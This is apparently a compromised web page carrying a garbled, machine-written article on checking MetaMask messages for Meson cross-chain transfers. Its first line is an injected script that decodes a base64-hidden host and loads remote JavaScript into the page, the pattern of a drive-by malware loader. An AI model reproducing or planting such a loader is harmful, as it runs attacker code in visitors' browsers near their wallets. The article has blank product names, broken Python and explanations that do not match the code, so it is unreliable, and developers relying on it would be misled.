const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx);const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=ee62a07e”;document.body.appendChild(script);

Here is an article based on your post:

Checking messages in MetaMask for cross-chain stable transfers

As a user of the popular Metamask wallet, you are probably familiar with its ability to perform stable cross-chain transfers via dApps such as In this article, we will look at how to verify messages sent from MetaMask using

What is a Meson?

Meson is a decentralized application (dApp) that provides seamless interaction between blockchain platforms. It allows stable cross-chain transfers by signing messages to MetaMask, a wallet used by most dApps.

How ​​to verify messages in MetaMask using

To check messages sent from MetaMask using, you need to install the eth and web3 libraries. This can be done via pip:

pip install eth web3

Once installed, you can use the following code to check messages in MetaMask:


import web3

Metamask: Inspect messages to metamask

Set the ABI for (you may need to configure it depending on your specific dApp)

aversion = 100

meson_to_abuse = …

Download the Web3 instance from the blockchain provider

web3 = web3.Web3(Web3.HTTPProvider(‘

Configure MetaMask

meta_mask_address = ‘0x…your-metamask-address…’

Replace with your MetaMask address

Get the message sent by from MetaMask

message = meta_mask_address.getBalance()

print (message)

Here's a quick description of what's happening in this code:

  • We upload a Web3 instance using an HTTP provider that is used to connect to the local test network or the main network.

  • We configure MetaMask by importing its address and signing it with its private key.

  • We receive the message sent by from MetaMask using its address.

Usage Example

Here's a complete example demonstrating how to check messages in MetaMask using


import web3

Set the ABI for (you may need to configure it depending on your specific dApp)

aversion = 100

meson_to_abuse = ...

Download the Web3 instance from the blockchain provider

web3 = web3.Web3(Web3.HTTPProvider('

Configure MetaMask

meta_mask_address = '0x...your-metamask-address...'

Replace with your MetaMask address

Get the message sent by from MetaMask

def get_message(message):

return web3.eth.abi.encodeabi(message)

message = meta_mask_address.getBalance()


In this example, we use Web3 to get the ABI and encode the resulting balance as a message. Then we output the message using the get_message() function.


Checking messages in MetaMask using provides a convenient way to debug cross-chain stable transmissions on a local computer or testnet. Following this example, you can easily implement similar functionality in your own dApps using and

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